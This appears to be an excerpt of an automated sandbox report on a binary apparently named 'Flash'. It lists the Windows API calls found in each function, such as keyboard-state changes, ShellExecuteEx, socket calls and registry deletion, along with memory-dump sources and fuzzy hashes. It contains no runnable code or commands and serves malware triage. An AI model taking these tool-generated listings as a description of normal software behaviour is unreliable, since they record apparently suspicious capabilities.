                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3479070676-0
                                                        • Opcode ID: b2ed0f765ab12ef4cae51fb4aa78956cbcf7f7072ee021bd5e67ba276937c9ed
                                                        • Instruction ID: 9f1961787f33bd361471541c23cc7097e37d4a3b193ef2db8e66b5912954b68c
                                                        • Opcode Fuzzy Hash: b2ed0f765ab12ef4cae51fb4aa78956cbcf7f7072ee021bd5e67ba276937c9ed
                                                        • Instruction Fuzzy Hash: 56A154702042019FCB11EF64C891F2EBBF5BF84315F14891DF9968B2A2DB71E999CB42
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A0C508,00000004,00000000,00000000,00000000), ref: 009D2E9F
                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00A0C508,00000004,00000000,00000000,00000000,000000FF), ref: 009D2EE7
                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00A0C508,00000004,00000000,00000000,00000000), ref: 00A0C55B
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A0C508,00000004,00000000,00000000,00000000), ref: 00A0C5C7
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: 5bca9f7bb34ed6a28746a2dbae5ab11a6533ab7175d590a8827a13b4853094fe
                                                        • Instruction ID: be7afef4f6cf1960803af00245848db7d164a5d52fa9dc556454769306c79c86
                                                        • Opcode Fuzzy Hash: 5bca9f7bb34ed6a28746a2dbae5ab11a6533ab7175d590a8827a13b4853094fe
                                                        • Instruction Fuzzy Hash: 93410F346886849AC7358B68DC88B6B7BA5BBA1310F14C95FE447467A1C7B5B881D730
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A37698
                                                          • Part of subcall function 009F0FE6: std::exception::exception.LIBCMT ref: 009F101C
                                                          • Part of subcall function 009F0FE6: __CxxThrowException@8.LIBCMT ref: 009F1031
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00A376CF
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00A376EB
                                                        • _memmove.LIBCMT ref: 00A37739
                                                        • _memmove.LIBCMT ref: 00A37756
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00A37765
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00A3777A
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A37799
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 256516436-0
                                                        • Opcode ID: e31b0c6a7a4a5ed563caf031ef9fcc0a93db29f4cef2eeaad2e154b6804e5a78
                                                        • Instruction ID: 704ee962a2fd9461e3378f9fbd5a1489075183c68134575fa72048f4daa13544
                                                        • Opcode Fuzzy Hash: e31b0c6a7a4a5ed563caf031ef9fcc0a93db29f4cef2eeaad2e154b6804e5a78
                                                        • Instruction Fuzzy Hash: BC318371904109EBCB10EFA4DC85EAFB778EF85710F1440A5FA04EB256DB709E51DBA0
                                                        APIs
                                                        • DeleteObject.GDI32(00000000), ref: 00A56810
                                                        • GetDC.USER32(00000000), ref: 00A56818
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A56823
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00A5682F
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00A5686B
                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00A5687C
                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00A5964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00A568B6
                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00A568D6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                        • String ID:
                                                        • API String ID: 3864802216-0
                                                        • Opcode ID: 4df885649434b5a3f173605528ab55523133657268a0eeb61c664d23476423bc
                                                        • Instruction ID: 633b6d0036c3a41e9829ee4d35cd42c205e5f7967b5ca73ccdc2e574a482047b
                                                        • Opcode Fuzzy Hash: 4df885649434b5a3f173605528ab55523133657268a0eeb61c664d23476423bc
                                                        • Instruction Fuzzy Hash: AF314B76101214BFEB118F50DC8AFAB3BA9FB49761F044065FE089A291D7B59892CBB4
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: a0308a0cb703ed3f25973989b94dd35a0d19c3652679f58ba609673b35c68efa
                                                        • Instruction ID: 610a27128e4b0e375d94acba301939a50e47861ad0f925b55a8ff9f1336f47a4
                                                        • Opcode Fuzzy Hash: a0308a0cb703ed3f25973989b94dd35a0d19c3652679f58ba609673b35c68efa
                                                        • Instruction Fuzzy Hash: 9121D773E01629BBD604B729AD42FBF377CAE61764B044434FE06A6242E710DE16C6E1
                                                        APIs
                                                          • Part of subcall function 009D4D37: __itow.LIBCMT ref: 009D4D62
                                                          • Part of subcall function 009D4D37: __swprintf.LIBCMT ref: 009D4DAC
                                                          • Part of subcall function 009E436A: _wcscpy.LIBCMT ref: 009E438D
                                                        • _wcstok.LIBCMT ref: 00A3F2D7
                                                        • _wcscpy.LIBCMT ref: 00A3F366
                                                        • _memset.LIBCMT ref: 00A3F399
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X
                                                        • API String ID: 774024439-3081909835
                                                        • Opcode ID: cfef0eb39bb198a5e809d7a8b7a5017f9124436d81372316922df972cbc20f5e
                                                        • Instruction ID: e89f95b5ff25e608c501d78194873928efb8ab9060ec6921d68700d39a094f2a
                                                        • Opcode Fuzzy Hash: cfef0eb39bb198a5e809d7a8b7a5017f9124436d81372316922df972cbc20f5e
                                                        • Instruction Fuzzy Hash: F9C159719147419FC724EF64C885B6BB7E4BF85350F10892EF8999B2A2DB30ED45CB82
                                                        APIs
                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A472EB
                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A4730C
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A4731F
                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00A473D5
                                                        • inet_ntoa.WSOCK32(?), ref: 00A47392
                                                          • Part of subcall function 00A2B4EA: _strlen.LIBCMT ref: 00A2B4F4
                                                          • Part of subcall function 00A2B4EA: _memmove.LIBCMT ref: 00A2B516
                                                        • _strlen.LIBCMT ref: 00A4742F
                                                        • _memmove.LIBCMT ref: 00A47498
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                        • String ID:
                                                        • API String ID: 3619996494-0
                                                        • Opcode ID: 84a8960e64011089dd7a0978c82b6446cc51f89df638956ca9107c3d85473fba
                                                        • Instruction ID: 15b5993c7e1c2ebbffdfa47ff5e90c751027cd20ca3e4dfee17938f9c6a28674
                                                        • Opcode Fuzzy Hash: 84a8960e64011089dd7a0978c82b6446cc51f89df638956ca9107c3d85473fba
                                                        • Instruction Fuzzy Hash: 9581AE75108240ABC310EB64DC85F6FB7B9AFC4714F148A1DF5569B2A2DB70ED41CBA2
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b84ed19337a0651f680d1f4a277f640fe977ff703b9ac2e2d8f2d978fadca70a
                                                        • Instruction ID: bd6869a282af154f2e289f4c8b832472643b8e538b314e5e9a51b790f3b768e3
                                                        • Opcode Fuzzy Hash: b84ed19337a0651f680d1f4a277f640fe977ff703b9ac2e2d8f2d978fadca70a
                                                        • Instruction Fuzzy Hash: D0715C31A40109FFCB04CF98DC89EAEBB79FF86314F14C55AF915AA251C7349A51DBA0
                                                        APIs
                                                        • IsWindow.USER32(00F653B8), ref: 00A5BA5D
                                                        • IsWindowEnabled.USER32(00F653B8), ref: 00A5BA69
                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00A5BB4D
                                                        • SendMessageW.USER32(00F653B8,000000B0,?,?), ref: 00A5BB84
                                                        • IsDlgButtonChecked.USER32(?,?), ref: 00A5BBC1
                                                        • GetWindowLongW.USER32(00F653B8,000000EC), ref: 00A5BBE3
                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A5BBFB
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                        • String ID:
                                                        • API String ID: 4072528602-0
                                                        • Opcode ID: 4297bd9dd8e5665755d0cc522520a1bee2b83140642f818d3c0dcd6f2de4a827
                                                        • Instruction ID: 9b90432f499c765d78608c856c79fec969cd110fb4deda46c2d21186ba2fba23
                                                        • Opcode Fuzzy Hash: 4297bd9dd8e5665755d0cc522520a1bee2b83140642f818d3c0dcd6f2de4a827
                                                        • Instruction Fuzzy Hash: 0D719A34624204AFDB25DF94C894FAABBB9FB49343F104059FE45972A5CB71AC49CB70
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A4FB31
                                                        • _memset.LIBCMT ref: 00A4FBFA
                                                        • ShellExecuteExW.SHELL32(?), ref: 00A4FC3F
                                                          • Part of subcall function 009D4D37: __itow.LIBCMT ref: 009D4D62
                                                          • Part of subcall function 009D4D37: __swprintf.LIBCMT ref: 009D4DAC
                                                          • Part of subcall function 009E436A: _wcscpy.LIBCMT ref: 009E438D
                                                        • GetProcessId.KERNEL32(00000000), ref: 00A4FCB6
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A4FCE5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 3522835683-2766056989
                                                        • Opcode ID: 7dd813decd52e25e78dcaf4842ed3a3fb06ba0a93662fe6bcc18bc7d543177f7
                                                        • Instruction ID: 05aea1579a6de1cffc0d1b0bcf832a351f01ca6de508e7694ebb8ea990e91ae3
                                                        • Opcode Fuzzy Hash: 7dd813decd52e25e78dcaf4842ed3a3fb06ba0a93662fe6bcc18bc7d543177f7
                                                        • Instruction Fuzzy Hash: 3E61C075A00619DFCB15EF94C494AAEB7F5FF89310F14846AE816AB391CB30AD42CF90
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00A3178B
                                                        • GetKeyboardState.USER32(?), ref: 00A317A0
                                                        • SetKeyboardState.USER32(?), ref: 00A31801
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00A3182F
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00A3184E
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00A31894
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A318B7
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: a27e7981174973d39c156c9c16c7090c4fa63b30c1b22a694d5348b420ca07ce
                                                        • Instruction ID: 373fe0795e3257969a12a45a387400dbf5133fa3ed0d04b30203fd18f725e75a
                                                        • Opcode Fuzzy Hash: a27e7981174973d39c156c9c16c7090c4fa63b30c1b22a694d5348b420ca07ce
                                                        • Instruction Fuzzy Hash: 3651D3A0A087D53EFB368734CC55BBABEE95B06700F0C8989F0D5468C2D2D8ACD5DB60
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00A315A4
                                                        • GetKeyboardState.USER32(?), ref: 00A315B9
                                                        • SetKeyboardState.USER32(?), ref: 00A3161A
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A31646
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A31663
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A316A7
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A316C8
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 39ac19f5b7533d28bc4a75dee11be7111d85e0a74eebde27955a4fb288d591df
                                                        • Instruction ID: 2acaab2212125527ba7cfc4c47195e0b851df1d747dceae02249e1e4743fc8a3
                                                        • Opcode Fuzzy Hash: 39ac19f5b7533d28bc4a75dee11be7111d85e0a74eebde27955a4fb288d591df
                                                        • Instruction Fuzzy Hash: B05106A0A047D53DFB328774CC56BBABEA95B06300F0C8589F0D9568C3D794EC99EB61
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalTime
                                                        • String ID:
                                                        • API String ID: 2945705084-0
                                                        • Opcode ID: ee820f6f9f0541ef99e9bf71b95587edab680fd453632c6f264e1d4ecc3d2207
                                                        • Instruction ID: e901ce7888ba531bb59652956cb97f43720c69a8e9d643feb6d46ef4ad44b60e
                                                        • Opcode Fuzzy Hash: ee820f6f9f0541ef99e9bf71b95587edab680fd453632c6f264e1d4ecc3d2207
                                                        • Instruction Fuzzy Hash: F641B0A6C6161C75CB11FBB8CC4ABDFB3B8AF44310F508866FA19E3121E634A315C3A5
                                                        APIs
                                                          • Part of subcall function 00A34BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A33B8A,?), ref: 00A34BE0
                                                          • Part of subcall function 00A34BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A33B8A,?), ref: 00A34BF9
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00A33BAA
                                                        • _wcscmp.LIBCMT ref: 00A33BC6
                                                        • MoveFileW.KERNEL32(?,?), ref: 00A33BDE
                                                        • _wcscat.LIBCMT ref: 00A33C26
                                                        • SHFileOperationW.SHELL32(?), ref: 00A33C92
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                        • String ID: \*.*
                                                        • API String ID: 1377345388-1173974218
                                                        • Opcode ID: cb34b5c689eeae8095097fd2109ce2502650a2b5d03007a5e1c6ef259e4c0379
                                                        • Instruction ID: fc4680268201e37210a1ec41f1d23d91b7f88402e5d46fcb760949e0f7eec444
                                                        • Opcode Fuzzy Hash: cb34b5c689eeae8095097fd2109ce2502650a2b5d03007a5e1c6ef259e4c0379
                                                        • Instruction Fuzzy Hash: 41418D7250C344AACB52EF64D485AEFB7ECAF88340F50192EF58AC3191EB34D688C752
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A578CF
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A57976
                                                        • IsMenu.USER32(?), ref: 00A5798E
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A579D6
                                                        • DrawMenuBar.USER32 ref: 00A579E9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                        • String ID: 0
                                                        • API String ID: 3866635326-4108050209
                                                        • Opcode ID: c78043fbe9c795c1cf6f10083ceb3fe4df5711c32c411f63fc0f5f758d0cbde8
                                                        • Instruction ID: 25d2d638bcb6ac215c549495b74964ccd0f1532318acfbe675e20403f1ea88c8
                                                        • Opcode Fuzzy Hash: c78043fbe9c795c1cf6f10083ceb3fe4df5711c32c411f63fc0f5f758d0cbde8
                                                        • Instruction Fuzzy Hash: 38414975A08209EFDB20DF94E884EAEBBF9FB05351F048129ED55A7250C770AD94CFA0
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00A51631
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A5165B
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00A51712
                                                          • Part of subcall function 00A51602: RegCloseKey.ADVAPI32(?), ref: 00A51678
                                                          • Part of subcall function 00A51602: FreeLibrary.KERNEL32(?), ref: 00A516CA
                                                          • Part of subcall function 00A51602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A516ED
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A516B5
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3254289671.00000000009D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3254219836.00000000009D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254407214.0000000000A86000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254562542.0000000000A90000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3254627331.0000000000A99000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_Flash.jbxd
